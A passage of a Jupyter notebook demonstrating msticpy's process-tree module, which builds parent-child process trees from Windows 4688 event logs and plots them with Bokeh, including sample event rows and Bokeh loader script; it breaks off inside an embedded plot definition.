{ "cells": [ { "cell_type": "markdown", "metadata": { "toc": true }, "source": [ "

Table of Contents

\n", "
" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "# msticpy - ProcessTree\n", "\n", "This notebook demonstrates the use of the process tree data and visualization modules. These modules can be used with either Windows process creation events (ID 4688) or Linux auditd logs.\n", "\n", "You must have msticpy installed to run this notebook:\n", "```\n", "!pip install --upgrade msticpy\n", "```\n", "\n", "There are two main components:\n", "- Process Tree creation - this takes a standard log from a single host and builds the parent-child relationships between processes in the data set. There are a set of utility functions to extract individual and partial trees from the processed data set.\n", "- Process Tree visualization - this takes the processed output from the previous component and displays the process tree using Bokeh plots.\n", "\n", "**Note** The expected schema for the Linux audit data is as produced by the `auditdextract.py` module in `msticpy`. This module combines related process exec messages into a single combined message that emulates the Windows 4688 event. This retains the audit schema apart from the following additions:\n", "- `cmdline`: this is a concatenation of the `a0`, `a1`, etc argument fields\n", "- `EventType`: this is the audit message type (`SYSCALL`, `EXECVE`, `CWD`, etc.) - the combined `SYSCALL_EXECVE` created by `auditextract` is the only type currently supported.\n", "\n", "Support for other formats such as Sysmon, Microsoft Defender is planned but not yet included." ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Extracting Process Trees from logs\n", "The input can be either Windows 4688 events or Linux audit events (with the above caveats)." ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "Import libraries and read in test data. Then call `build_process_tree` to extract the parent-child relationships between processes." ] }, { "cell_type": "code", "execution_count": 1, "metadata": { "ExecuteTime": { "end_time": "2020-08-25T15:53:29.356995Z", "start_time": "2020-08-25T15:53:24.442999Z" }, "execution_event_id": "6aa53b32-e975-456d-bb18-ffb7e43d2bfd", "last_executed_text": "import pandas as pd\nimport numpy as np\nprocs = pd.read_pickle(\"../demos/data/processes_on_host.pkl\")", "persistent_id": "7b5a3079-d2e1-481d-a076-8eaa96f1c430" }, "outputs": [ { "data": { "text/html": [ "
\n", "\n", "\n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", "
TenantIdAccountEventIDTimeGeneratedComputerSubjectUserSidSubjectUserNameSubjectDomainNameSubjectLogonIdNewProcessIdNewProcessNameTokenElevationTypeProcessIdCommandLineParentProcessNameTargetLogonIdSourceComputerIdTimeCreatedUtc
052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 15:21:06.890MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xd78C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...%%19360x1994\"CollectGuestLogs.exe\" -Mode:ga -FileName:C:\\W...C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...0x0263a788b-6526-4cdc-8ed9-d79402fe4aa02019-02-10 15:21:06.890
152b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 15:21:06.907MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x221cC:\\Windows\\System32\\conhost.exe%%19360xd78\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff...C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...0x0263a788b-6526-4cdc-8ed9-d79402fe4aa02019-02-10 15:21:06.907
252b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 14:15:36.253MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x638C:\\Program Files\\Microsoft Monitoring Agent\\Ag...%%19360xe24\"C:\\Program Files\\Microsoft Monitoring Agent\\A...C:\\Program Files\\Microsoft Monitoring Agent\\Ag...0x0263a788b-6526-4cdc-8ed9-d79402fe4aa02019-02-10 14:15:36.253
352b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 14:15:36.270MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x115cC:\\Windows\\System32\\conhost.exe%%19360x638\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff...C:\\Program Files\\Microsoft Monitoring Agent\\Ag...0x0263a788b-6526-4cdc-8ed9-d79402fe4aa02019-02-10 14:15:36.270
452b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 15:48:18.437MSTICAlertsWin1S-1-5-20MSTICAlertsWin1$WORKGROUP0x3e40x2364C:\\Windows\\System32\\reg.exe%%19360x1c24reg \"C:\\diagnostics\\WinBenignActivity.cmd\" -2...C:\\Windows\\System32\\cmd.exe0x0263a788b-6526-4cdc-8ed9-d79402fe4aa02019-02-10 15:48:18.437
\n", "
" ], "text/plain": [ " TenantId Account EventID \\\n", "0 52b1ab41-869e-4138-9e40-2a4457f09bf0 WORKGROUP\\MSTICAlertsWin1$ 4688 \n", "1 52b1ab41-869e-4138-9e40-2a4457f09bf0 WORKGROUP\\MSTICAlertsWin1$ 4688 \n", "2 52b1ab41-869e-4138-9e40-2a4457f09bf0 WORKGROUP\\MSTICAlertsWin1$ 4688 \n", "3 52b1ab41-869e-4138-9e40-2a4457f09bf0 WORKGROUP\\MSTICAlertsWin1$ 4688 \n", "4 52b1ab41-869e-4138-9e40-2a4457f09bf0 WORKGROUP\\MSTICAlertsWin1$ 4688 \n", "\n", " TimeGenerated Computer SubjectUserSid SubjectUserName \\\n", "0 2019-02-10 15:21:06.890 MSTICAlertsWin1 S-1-5-18 MSTICAlertsWin1$ \n", "1 2019-02-10 15:21:06.907 MSTICAlertsWin1 S-1-5-18 MSTICAlertsWin1$ \n", "2 2019-02-10 14:15:36.253 MSTICAlertsWin1 S-1-5-18 MSTICAlertsWin1$ \n", "3 2019-02-10 14:15:36.270 MSTICAlertsWin1 S-1-5-18 MSTICAlertsWin1$ \n", "4 2019-02-10 15:48:18.437 MSTICAlertsWin1 S-1-5-20 MSTICAlertsWin1$ \n", "\n", " SubjectDomainName SubjectLogonId NewProcessId \\\n", "0 WORKGROUP 0x3e7 0xd78 \n", "1 WORKGROUP 0x3e7 0x221c \n", "2 WORKGROUP 0x3e7 0x638 \n", "3 WORKGROUP 0x3e7 0x115c \n", "4 WORKGROUP 0x3e4 0x2364 \n", "\n", " NewProcessName TokenElevationType \\\n", "0 C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-... %%1936 \n", "1 C:\\Windows\\System32\\conhost.exe %%1936 \n", "2 C:\\Program Files\\Microsoft Monitoring Agent\\Ag... %%1936 \n", "3 C:\\Windows\\System32\\conhost.exe %%1936 \n", "4 C:\\Windows\\System32\\reg.exe %%1936 \n", "\n", " ProcessId CommandLine \\\n", "0 0x1994 \"CollectGuestLogs.exe\" -Mode:ga -FileName:C:\\W... \n", "1 0xd78 \\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff... \n", "2 0xe24 \"C:\\Program Files\\Microsoft Monitoring Agent\\A... \n", "3 0x638 \\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff... \n", "4 0x1c24 reg \"C:\\diagnostics\\WinBenignActivity.cmd\" -2... \n", "\n", " ParentProcessName TargetLogonId \\\n", "0 C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-... 0x0 \n", "1 C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-... 0x0 \n", "2 C:\\Program Files\\Microsoft Monitoring Agent\\Ag... 0x0 \n", "3 C:\\Program Files\\Microsoft Monitoring Agent\\Ag... 0x0 \n", "4 C:\\Windows\\System32\\cmd.exe 0x0 \n", "\n", " SourceComputerId TimeCreatedUtc \n", "0 263a788b-6526-4cdc-8ed9-d79402fe4aa0 2019-02-10 15:21:06.890 \n", "1 263a788b-6526-4cdc-8ed9-d79402fe4aa0 2019-02-10 15:21:06.907 \n", "2 263a788b-6526-4cdc-8ed9-d79402fe4aa0 2019-02-10 14:15:36.253 \n", "3 263a788b-6526-4cdc-8ed9-d79402fe4aa0 2019-02-10 14:15:36.270 \n", "4 263a788b-6526-4cdc-8ed9-d79402fe4aa0 2019-02-10 15:48:18.437 " ] }, "metadata": {}, "output_type": "display_data" } ], "source": [ "from IPython.display import display\n", "import pandas as pd\n", "from msticpy.nbtools import *\n", "from msticpy.sectools import *\n", "\n", "win_procs = pd.read_pickle(\"./data/win_proc_test.pkl\")\n", "display(win_procs.head())" ] }, { "cell_type": "code", "execution_count": 2, "metadata": { "ExecuteTime": { "end_time": "2020-08-25T15:53:29.611997Z", "start_time": "2020-08-25T15:53:29.358995Z" }, "execution_event_id": "6aa53b32-e975-456d-bb18-ffb7e43d2bfd", "last_executed_text": "import pandas as pd\nimport numpy as np\nprocs = pd.read_pickle(\"../demos/data/processes_on_host.pkl\")", "persistent_id": "7b5a3079-d2e1-481d-a076-8eaa96f1c430" }, "outputs": [ { "data": { "application/vnd.jupyter.widget-view+json": { "model_id": "8fbdc16122b643189c84d5561d9af170", "version_major": 2, "version_minor": 0 }, "text/plain": [ "HBox(children=(IntProgress(value=0, bar_style='info', description='Progress:'), Label(value='0%')))" ] }, "metadata": {}, "output_type": "display_data" }, { "name": "stdout", "output_type": "stream", "text": [ "{'Processes': 1010, 'RootProcesses': 10, 'LeafProcesses': 815, 'BranchProcesses': 185, 'IsolatedProcesses': 0, 'LargestTreeDepth': 7}\n" ] } ], "source": [ "p_tree_win = ptree.build_process_tree(win_procs, show_progress=True)" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Process Tree utils module\n", "The module is imported as follows:\n", "```\n", "from msticpy.sectools import *\n", "```\n", "or explicitly \n", "```\n", "from msticpy.sectools import process_tree_utils as ptree\n", "```\n", "\n", "The module contains functions for building the parent-child relations as well as a number of utility functions for manipulating and extracting the trees. Most of these are described in the later section [Process Tree utility functions](#Process-Tree-utility-functions).\n" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Plotting a Process Tree" ] }, { "cell_type": "code", "execution_count": 3, "metadata": { "ExecuteTime": { "end_time": "2020-08-25T15:53:29.912000Z", "start_time": "2020-08-25T15:53:29.614996Z" }, "persistent_id": "77bbbefd-2888-4127-b95a-18e2f1030039" }, "outputs": [ { "data": { "text/html": [ "\n", "
\n", " \n", " Loading BokehJS ...\n", "
" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "application/javascript": [ "\n", "(function(root) {\n", " function now() {\n", " return new Date();\n", " }\n", "\n", " var force = true;\n", "\n", " if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n", " root._bokeh_onload_callbacks = [];\n", " root._bokeh_is_loading = undefined;\n", " }\n", "\n", " var JS_MIME_TYPE = 'application/javascript';\n", " var HTML_MIME_TYPE = 'text/html';\n", " var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n", " var CLASS_NAME = 'output_bokeh rendered_html';\n", "\n", " /**\n", " * Render data to the DOM node\n", " */\n", " function render(props, node) {\n", " var script = document.createElement(\"script\");\n", " node.appendChild(script);\n", " }\n", "\n", " /**\n", " * Handle when an output is cleared or removed\n", " */\n", " function handleClearOutput(event, handle) {\n", " var cell = handle.cell;\n", "\n", " var id = cell.output_area._bokeh_element_id;\n", " var server_id = cell.output_area._bokeh_server_id;\n", " // Clean up Bokeh references\n", " if (id != null && id in Bokeh.index) {\n", " Bokeh.index[id].model.document.clear();\n", " delete Bokeh.index[id];\n", " }\n", "\n", " if (server_id !== undefined) {\n", " // Clean up Bokeh references\n", " var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n", " cell.notebook.kernel.execute(cmd, {\n", " iopub: {\n", " output: function(msg) {\n", " var id = msg.content.text.trim();\n", " if (id in Bokeh.index) {\n", " Bokeh.index[id].model.document.clear();\n", " delete Bokeh.index[id];\n", " }\n", " }\n", " }\n", " });\n", " // Destroy server and session\n", " var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n", " cell.notebook.kernel.execute(cmd);\n", " }\n", " }\n", "\n", " /**\n", " * Handle when a new output is added\n", " */\n", " function handleAddOutput(event, handle) {\n", " var output_area = handle.output_area;\n", " var output = handle.output;\n", "\n", " // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n", " if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n", " return\n", " }\n", "\n", " var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n", "\n", " if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n", " toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n", " // store reference to embed id on output_area\n", " output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n", " }\n", " if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n", " var bk_div = document.createElement(\"div\");\n", " bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n", " var script_attrs = bk_div.children[0].attributes;\n", " for (var i = 0; i < script_attrs.length; i++) {\n", " toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n", " toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n", " }\n", " // store reference to server id on output_area\n", " output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n", " }\n", " }\n", "\n", " function register_renderer(events, OutputArea) {\n", "\n", " function append_mime(data, metadata, element) {\n", " // create a DOM node to render to\n", " var toinsert = this.create_output_subarea(\n", " metadata,\n", " CLASS_NAME,\n", " EXEC_MIME_TYPE\n", " );\n", " this.keyboard_manager.register_events(toinsert);\n", " // Render to node\n", " var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n", " render(props, toinsert[toinsert.length - 1]);\n", " element.append(toinsert);\n", " return toinsert\n", " }\n", "\n", " /* Handle when an output is cleared or removed */\n", " events.on('clear_output.CodeCell', handleClearOutput);\n", " events.on('delete.Cell', handleClearOutput);\n", "\n", " /* Handle when a new output is added */\n", " events.on('output_added.OutputArea', handleAddOutput);\n", "\n", " /**\n", " * Register the mime type and append_mime function with output_area\n", " */\n", " OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n", " /* Is output safe? */\n", " safe: true,\n", " /* Index of renderer in `output_area.display_order` */\n", " index: 0\n", " });\n", " }\n", "\n", " // register the mime type if in Jupyter Notebook environment and previously unregistered\n", " if (root.Jupyter !== undefined) {\n", " var events = require('base/js/events');\n", " var OutputArea = require('notebook/js/outputarea').OutputArea;\n", "\n", " if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n", " register_renderer(events, OutputArea);\n", " }\n", " }\n", "\n", " \n", " if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n", " root._bokeh_timeout = Date.now() + 5000;\n", " root._bokeh_failed_load = false;\n", " }\n", "\n", " var NB_LOAD_WARNING = {'data': {'text/html':\n", " \"
\\n\"+\n", " \"

\\n\"+\n", " \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n", " \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n", " \"

\\n\"+\n", " \"\\n\"+\n", " \"\\n\"+\n", " \"from bokeh.resources import INLINE\\n\"+\n", " \"output_notebook(resources=INLINE)\\n\"+\n", " \"\\n\"+\n", " \"
\"}};\n", "\n", " function display_loaded() {\n", " var el = document.getElementById(\"1001\");\n", " if (el != null) {\n", " el.textContent = \"BokehJS is loading...\";\n", " }\n", " if (root.Bokeh !== undefined) {\n", " if (el != null) {\n", " el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n", " }\n", " } else if (Date.now() < root._bokeh_timeout) {\n", " setTimeout(display_loaded, 100)\n", " }\n", " }\n", "\n", "\n", " function run_callbacks() {\n", " try {\n", " root._bokeh_onload_callbacks.forEach(function(callback) {\n", " if (callback != null)\n", " callback();\n", " });\n", " } finally {\n", " delete root._bokeh_onload_callbacks\n", " }\n", " console.debug(\"Bokeh: all callbacks have finished\");\n", " }\n", "\n", " function load_libs(css_urls, js_urls, callback) {\n", " if (css_urls == null) css_urls = [];\n", " if (js_urls == null) js_urls = [];\n", "\n", " root._bokeh_onload_callbacks.push(callback);\n", " if (root._bokeh_is_loading > 0) {\n", " console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n", " return null;\n", " }\n", " if (js_urls == null || js_urls.length === 0) {\n", " run_callbacks();\n", " return null;\n", " }\n", " console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n", " root._bokeh_is_loading = css_urls.length + js_urls.length;\n", "\n", " function on_load() {\n", " root._bokeh_is_loading--;\n", " if (root._bokeh_is_loading === 0) {\n", " console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n", " run_callbacks()\n", " }\n", " }\n", "\n", " function on_error() {\n", " console.error(\"failed to load \" + url);\n", " }\n", "\n", " for (var i = 0; i < css_urls.length; i++) {\n", " var url = css_urls[i];\n", " const element = document.createElement(\"link\");\n", " element.onload = on_load;\n", " element.onerror = on_error;\n", " element.rel = \"stylesheet\";\n", " element.type = \"text/css\";\n", " element.href = url;\n", " console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n", " document.body.appendChild(element);\n", " }\n", "\n", " const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\": \"kLr4fYcqcSpbuI95brIH3vnnYCquzzSxHPU6XGQCIkQRGJwhg0StNbj1eegrHs12\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\": \"xIGPmVtaOm+z0BqfSOMn4lOR6ciex448GIKG4eE61LsAvmGj48XcMQZtKcE/UXZe\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\": \"Dc9u1wF/0zApGIWoBbH77iWEHtdmkuYWG839Uzmv8y8yBLXebjO9ZnERsde5Ln/P\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\": \"cT9JaBz7GiRXdENrJLZNSC6eMNF3nh3fa5fTF51Svp+ukxPdwcU5kGXGPBgDCa2j\"};\n", "\n", " for (var i = 0; i < js_urls.length; i++) {\n", " var url = js_urls[i];\n", " var element = document.createElement('script');\n", " element.onload = on_load;\n", " element.onerror = on_error;\n", " element.async = false;\n", " element.src = url;\n", " if (url in hashes) {\n", " element.crossOrigin = \"anonymous\";\n", " element.integrity = \"sha384-\" + hashes[url];\n", " }\n", " console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n", " document.head.appendChild(element);\n", " }\n", " };\n", "\n", " function inject_raw_css(css) {\n", " const element = document.createElement(\"style\");\n", " element.appendChild(document.createTextNode(css));\n", " document.body.appendChild(element);\n", " }\n", "\n", " \n", " var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\"];\n", " var css_urls = [];\n", " \n", "\n", " var inline_js = [\n", " function(Bokeh) {\n", " Bokeh.set_log_level(\"info\");\n", " },\n", " function(Bokeh) {\n", " \n", " \n", " }\n", " ];\n", "\n", " function run_inline_js() {\n", " \n", " if (root.Bokeh !== undefined || force === true) {\n", " \n", " for (var i = 0; i < inline_js.length; i++) {\n", " inline_js[i].call(root, root.Bokeh);\n", " }\n", " if (force === true) {\n", " display_loaded();\n", " }} else if (Date.now() < root._bokeh_timeout) {\n", " setTimeout(run_inline_js, 100);\n", " } else if (!root._bokeh_failed_load) {\n", " console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n", " root._bokeh_failed_load = true;\n", " } else if (force !== true) {\n", " var cell = $(document.getElementById(\"1001\")).parents('.cell').data().cell;\n", " cell.output_area.append_execute_result(NB_LOAD_WARNING)\n", " }\n", "\n", " }\n", "\n", " if (root._bokeh_is_loading === 0) {\n", " console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n", " run_inline_js();\n", " } else {\n", " load_libs(css_urls, js_urls, function() {\n", " console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n", " run_inline_js();\n", " });\n", " }\n", "}(window));" ], "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n function now() {\n return new Date();\n }\n\n var force = true;\n\n if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n root._bokeh_onload_callbacks = [];\n root._bokeh_is_loading = undefined;\n }\n\n \n\n \n if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n root._bokeh_timeout = Date.now() + 5000;\n root._bokeh_failed_load = false;\n }\n\n var NB_LOAD_WARNING = {'data': {'text/html':\n \"
\\n\"+\n \"

\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"

\\n\"+\n \"\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"\\n\"+\n \"
\"}};\n\n function display_loaded() {\n var el = document.getElementById(\"1001\");\n if (el != null) {\n el.textContent = \"BokehJS is loading...\";\n }\n if (root.Bokeh !== undefined) {\n if (el != null) {\n el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n }\n } else if (Date.now() < root._bokeh_timeout) {\n setTimeout(display_loaded, 100)\n }\n }\n\n\n function run_callbacks() {\n try {\n root._bokeh_onload_callbacks.forEach(function(callback) {\n if (callback != null)\n callback();\n });\n } finally {\n delete root._bokeh_onload_callbacks\n }\n console.debug(\"Bokeh: all callbacks have finished\");\n }\n\n function load_libs(css_urls, js_urls, callback) {\n if (css_urls == null) css_urls = [];\n if (js_urls == null) js_urls = [];\n\n root._bokeh_onload_callbacks.push(callback);\n if (root._bokeh_is_loading > 0) {\n console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n return null;\n }\n if (js_urls == null || js_urls.length === 0) {\n run_callbacks();\n return null;\n }\n console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n function on_load() {\n root._bokeh_is_loading--;\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n run_callbacks()\n }\n }\n\n function on_error() {\n console.error(\"failed to load \" + url);\n }\n\n for (var i = 0; i < css_urls.length; i++) {\n var url = css_urls[i];\n const element = document.createElement(\"link\");\n element.onload = on_load;\n element.onerror = on_error;\n element.rel = \"stylesheet\";\n element.type = \"text/css\";\n element.href = url;\n console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n document.body.appendChild(element);\n }\n\n const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\": \"kLr4fYcqcSpbuI95brIH3vnnYCquzzSxHPU6XGQCIkQRGJwhg0StNbj1eegrHs12\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\": \"xIGPmVtaOm+z0BqfSOMn4lOR6ciex448GIKG4eE61LsAvmGj48XcMQZtKcE/UXZe\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\": \"Dc9u1wF/0zApGIWoBbH77iWEHtdmkuYWG839Uzmv8y8yBLXebjO9ZnERsde5Ln/P\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\": \"cT9JaBz7GiRXdENrJLZNSC6eMNF3nh3fa5fTF51Svp+ukxPdwcU5kGXGPBgDCa2j\"};\n\n for (var i = 0; i < js_urls.length; i++) {\n var url = js_urls[i];\n var element = document.createElement('script');\n element.onload = on_load;\n element.onerror = on_error;\n element.async = false;\n element.src = url;\n if (url in hashes) {\n element.crossOrigin = \"anonymous\";\n element.integrity = \"sha384-\" + hashes[url];\n }\n console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n document.head.appendChild(element);\n }\n };\n\n function inject_raw_css(css) {\n const element = document.createElement(\"style\");\n element.appendChild(document.createTextNode(css));\n document.body.appendChild(element);\n }\n\n \n var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\"];\n var css_urls = [];\n \n\n var inline_js = [\n function(Bokeh) {\n Bokeh.set_log_level(\"info\");\n },\n function(Bokeh) {\n \n \n }\n ];\n\n function run_inline_js() {\n \n if (root.Bokeh !== undefined || force === true) {\n \n for (var i = 0; i < inline_js.length; i++) {\n inline_js[i].call(root, root.Bokeh);\n }\n if (force === true) {\n display_loaded();\n }} else if (Date.now() < root._bokeh_timeout) {\n setTimeout(run_inline_js, 100);\n } else if (!root._bokeh_failed_load) {\n console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n root._bokeh_failed_load = true;\n } else if (force !== true) {\n var cell = $(document.getElementById(\"1001\")).parents('.cell').data().cell;\n cell.output_area.append_execute_result(NB_LOAD_WARNING)\n }\n\n }\n\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n run_inline_js();\n } else {\n load_libs(css_urls, js_urls, function() {\n console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n run_inline_js();\n });\n }\n}(window));" }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": [ "\n", "\n", "\n", "\n", "\n", "\n", "
\n" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "application/javascript": [ "(function(root) {\n", " function embed_document(root) {\n", " \n", " var docs_json = {\"8661baa3-6348-44c9-825c-737061f29008\":{\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"1116\"},{\"id\":\"1129\"}]},\"id\":\"1131\",\"type\":\"Column\"},{\"attributes\":{\"columns\":[{\"id\":\"1118\"},{\"id\":\"1120\"},{\"id\":\"1121\"},{\"id\":\"1122\"},{\"id\":\"1123\"},{\"id\":\"1124\"},{\"id\":\"1125\"},{\"id\":\"1126\"},{\"id\":\"1127\"},{\"id\":\"1128\"}],\"height\":150,\"source\":{\"id\":\"1002\"},\"view\":{\"id\":\"1130\"},\"width\":950},\"id\":\"1129\",\"type\":\"DataTable\"},{\"attributes\":{\"editor\":{\"id\":\"1136\"},\"field\":\"SubjectUserName\",\"formatter\":{\"id\":\"1137\"},\"title\":\"SubjectUserName\"},\"id\":\"1120\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1045\",\"type\":\"Selection\"},{\"attributes\":{\"editor\":{\"id\":\"1138\"},\"field\":\"SubjectUserSid\",\"formatter\":{\"id\":\"1139\"},\"title\":\"SubjectUserSid\"},\"id\":\"1121\",\"type\":\"TableColumn\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":null,\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1023\"},{\"id\":\"1024\"},{\"id\":\"1025\"},{\"id\":\"1026\"},{\"id\":\"1032\"}]},\"id\":\"1027\",\"type\":\"Toolbar\"},{\"attributes\":{\"editor\":{\"id\":\"1140\"},\"field\":\"SubjectLogonId\",\"formatter\":{\"id\":\"1141\"},\"title\":\"SubjectLogonId\"},\"id\":\"1122\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1142\"},\"field\":\"NewProcessId\",\"formatter\":{\"id\":\"1143\"},\"title\":\"NewProcessId\"},\"id\":\"1123\",\"type\":\"TableColumn\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"1003\"}},\"height\":{\"units\":\"data\",\"value\":0.95},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1034\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1037\",\"type\":\"Rect\"},{\"attributes\":{},\"id\":\"1046\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"editor\":{\"id\":\"1144\"},\"field\":\"NewProcessName\",\"formatter\":{\"id\":\"1145\"},\"title\":\"NewProcessName\"},\"id\":\"1124\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1146\"},\"field\":\"CommandLine\",\"formatter\":{\"id\":\"1147\"},\"title\":\"CommandLine\"},\"id\":\"1125\",\"type\":\"TableColumn\"},{\"attributes\":{\"callbac